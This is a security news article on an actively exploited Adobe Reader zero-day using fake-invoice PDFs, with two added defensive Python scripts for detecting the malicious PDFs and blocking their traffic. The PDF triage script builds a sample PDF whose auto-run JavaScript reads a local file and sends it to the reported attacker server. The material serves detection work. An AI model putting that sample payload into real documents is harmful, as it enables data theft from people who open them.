Hackers have been exploiting an as-yet unidentified flaw in Adobe Reader since at least November 2025. This zero-day vulnerability was first discovered by security expert Haifei Li, founder of EXPMON, a sandbox-based exploit detection system.

How the attack works

Haifei Li found that the attack is triggered as soon as a victim opens a specially crafted PDF file. One sample identified on VirusTotal was named “Invoice540.pdf,” suggesting the attackers are using fake invoices as a lure. Li notes that the exploit is particularly dangerous because it runs on the latest version of Adobe Reader without requiring any additional user interaction.

[Image: detected sample of the malicious PDF (Source: Haifei Li)]

Once the file is open, it runs hidden, heavily obfuscated JavaScript code. This code abuses two of Adobe Reader's built-in JavaScript APIs: util.readFileIntoStream, which is normally used to read files, and RSS.addFeed, which normally manages web feed subscriptions. By chaining these, the hackers can secretly read data from the computer and send it to a remote server at the address 169.40.2.68.

Li further explained in a blog post that this is just the first step: by collecting information and fingerprinting the computer, the hackers can prepare for even worse actions. These include Remote Code Execution (RCE), which lets them run their own programmes on the victim’s machine, or a Sandbox Escape (SBX) to bypass Reader's built-in security barriers and take full control.
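A defender's first question after reading the above is how to spot such a document before it reaches a user. The following added example (not code from the article or from Li's EXPMON) is a static triage script that inflates a PDF's Flate-compressed streams and looks for the indicators the article names: the two abused APIs, the 169.40.2.68 server, and generic JavaScript auto-run markers. The sample PDF it builds is constructed for the example and is not the real "Invoice540.pdf".

```python
import re
import zlib

# Indicators taken from the article: the two Acrobat JavaScript APIs the exploit
# abuses and the server the stolen data is sent to.
SUSPICIOUS_API_CALLS = (b"util.readFileIntoStream", b"RSS.addFeed")
EXFIL_SERVER = b"169.40.2.68"
# Generic PDF features worth flagging alongside the specific indicators:
# JavaScript actions and the dictionaries that run them automatically.
PDF_JS_MARKERS = (b"/JavaScript", b"/JS", b"/OpenAction", b"/AA")

STREAM_RE = re.compile(rb"stream\r?\n(.*?)\r?\nendstream", re.DOTALL)


def extract_text(pdf_bytes: bytes) -> bytes:
    """Return the raw PDF plus every stream body we could inflate.

    Acrobat JavaScript is usually stored inside /FlateDecode streams, so a
    plain grep over the file misses it; zlib is tried on each stream body.
    """
    parts = [pdf_bytes]
    for match in STREAM_RE.finditer(pdf_bytes):
        try:
            parts.append(zlib.decompress(match.group(1)))
        except zlib.error:
            pass  # not Flate-compressed (or encrypted); raw bytes are in parts[0]
    return b"\n".join(parts)


def triage_pdf(pdf_bytes: bytes) -> dict:
    """Score a PDF against the indicators described in the article."""
    text = extract_text(pdf_bytes)
    hits = {
        "js_markers": [m.decode() for m in PDF_JS_MARKERS if m in text],
        "api_calls": [a.decode() for a in SUSPICIOUS_API_CALLS if a in text],
        "exfil_server": EXFIL_SERVER in text,
    }
    # Any of the article's specific indicators is enough to quarantine;
    # JavaScript on its own is only a reason to look closer.
    if hits["api_calls"] or hits["exfil_server"]:
        hits["verdict"] = "quarantine"
    elif hits["js_markers"]:
        hits["verdict"] = "review"
    else:
        hits["verdict"] = "clean"
    return hits


def build_sample_pdf() -> bytes:
    """Constructed sample (hypothetical, not the attacker's file): a minimal PDF
    whose OpenAction runs JavaScript stored in a Flate-compressed stream."""
    js = (b"var f = util.readFileIntoStream('/c/users/victim/secret.txt');"
          b"RSS.addFeed('http://169.40.2.68/feed');")
    compressed = zlib.compress(js)
    return (
        b"%PDF-1.7\n"
        b"1 0 obj << /Type /Catalog /Pages 2 0 R /OpenAction 3 0 R >> endobj\n"
        b"2 0 obj << /Type /Pages /Kids [] /Count 0 >> endobj\n"
        b"3 0 obj << /S /JavaScript /JS 4 0 R >> endobj\n"
        b"4 0 obj << /Length " + str(len(compressed)).encode()
        + b" /Filter /FlateDecode >>\nstream\n" + compressed
        + b"\nendstream\nendobj\n"
        b"trailer << /Root 1 0 R >>\n%%EOF\n"
    )


if __name__ == "__main__":
    print(triage_pdf(build_sample_pdf()))
```

The script only catches API names that survive as literal strings; the article stresses the JavaScript is heavily obfuscated, so a real sample may assemble "readFileIntoStream" at run time, and any PDF that reaches the "review" verdict deserves a look in a sandbox such as the one Li used rather than a second grep.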

Dear security community/researchers, I'd really like to call to look at this https://t.co/BuvZtpBChe, this information shows that the threat actors behind this Adobe Reader 0day attack were not just collecting local information but were really delivering additional exploits, need…

— Haifei Li (@HaifeiLi) April 8, 2026

Russian oil and gas lures

The attackers seem to be focused on specific groups. Security analyst Giuseppe Massaro (Gi7w0rm) looked into the malicious documents and found that they were written in Russian, with text about news and events in the Russian oil and gas industry to make the lure emails look real.

Apparent #0day in Adobe Reader has been observed in the wild. Seems to exploit part of Adobe Reader's JavaScript engine. Documents observed contain Russian language lures and refer to issues regarding current events related to the oil and gas industry in Russia. https://t.co/QRu63fuAP4

— Gi7w0rm (@Gi7w0rm) April 8, 2026

More concerning is that this is not the first time Adobe Reader has faced similar issues. A previous flaw, tracked as CVE-2024-41869, was also reported by Haifei Li, although Adobe did not confirm whether it had been exploited in real-world attacks at the time.

Adobe was notified about the flaw around 7 April, but they have not released an update to fix it just yet. Li, who has a long history of finding bugs at companies like Microsoft, said it is vital for the public to know about this now so they can stay safe.

Since no official fix or patch is available yet, be careful when opening PDF files from people you don’t know, and those who manage office networks should block internet traffic that mentions Adobe Synchronizer in the header to stop the hackers from communicating with infected computers.
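The blocking advice above is easy to state and easy to get wrong in a proxy rule. As an added example (not from the article or from Adobe), here is a small inspector for raw HTTP requests that flags the two network indicators the article gives: any header whose value mentions Adobe Synchronizer, and any request addressed to 169.40.2.68. The article does not say which header carries the string, so every header is checked; the request samples are constructed for the example.

```python
from dataclasses import dataclass, field

# Indicators from the article: the header string the attacker's traffic carries
# and the server the stolen data is sent to.
HEADER_INDICATOR = "adobe synchronizer"
EXFIL_SERVER = "169.40.2.68"


@dataclass
class Verdict:
    block: bool
    reasons: list = field(default_factory=list)


def parse_request(raw: str) -> tuple[str, dict]:
    """Split a raw HTTP/1.1 request into (Host header value, {header: value}).

    Header names are lower-cased so the match does not depend on how the
    client capitalises them; values keep their case for reporting.
    """
    head, _, _ = raw.partition("\r\n\r\n")
    headers = {}
    for line in head.split("\r\n")[1:]:  # skip the request line
        name, sep, value = line.partition(":")
        if sep:
            headers[name.strip().lower()] = value.strip()
    return headers.get("host", ""), headers


def inspect_request(raw: str) -> Verdict:
    """Return a block decision plus the reasons, one per matched indicator."""
    host, headers = parse_request(raw)
    verdict = Verdict(block=False)
    # The article only says "in the header", so scan all of them rather than
    # guessing that it is the User-Agent.
    for name, value in headers.items():
        if HEADER_INDICATOR in value.lower():
            verdict.reasons.append(f"header '{name}' mentions Adobe Synchronizer")
            break
    if host.split(":")[0] == EXFIL_SERVER:
        verdict.reasons.append(f"destination is the reported exfiltration server {EXFIL_SERVER}")
    verdict.block = bool(verdict.reasons)
    return verdict


def scan_log(requests: list) -> list:
    """Run inspect_request over captured requests; return the ones to block."""
    return [(i, v.reasons) for i, raw in enumerate(requests)
            if (v := inspect_request(raw)).block]


# Constructed samples (hypothetical traffic, not captures from the campaign).
SAMPLE_EXFIL = (
    "POST /feed HTTP/1.1\r\n"
    "Host: 169.40.2.68\r\n"
    "User-Agent: Adobe Synchronizer\r\n"
    "Content-Length: 0\r\n\r\n"
)
SAMPLE_HEADER_ONLY = (
    "GET /rss HTTP/1.1\r\n"
    "Host: example.invalid\r\n"
    "User-Agent: Adobe Synchronizer\r\n\r\n"
)
SAMPLE_BENIGN = (
    "GET / HTTP/1.1\r\n"
    "Host: example.invalid\r\n"
    "User-Agent: Mozilla/5.0\r\n\r\n"
)

if __name__ == "__main__":
    for idx, reasons in scan_log([SAMPLE_EXFIL, SAMPLE_HEADER_ONLY, SAMPLE_BENIGN]):
        print(f"request {idx}: block ({'; '.join(reasons)})")
```

Two practical notes: Adobe Synchronizer is also the name of a legitimate Acrobat component, so run the rule in log-only mode first to see how much ordinary Acrobat traffic carries that header before turning it into a hard block, and treat a hit on the IP address as the stronger of the two signals, since the attacker can change a header string far more cheaply than a server.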

Deeba is a veteran cybersecurity reporter at Hackread.com with over a decade of experience covering cybercrime, vulnerabilities, and security events. Her expertise and in-depth analysis make her a key contributor to the platform’s trusted coverage.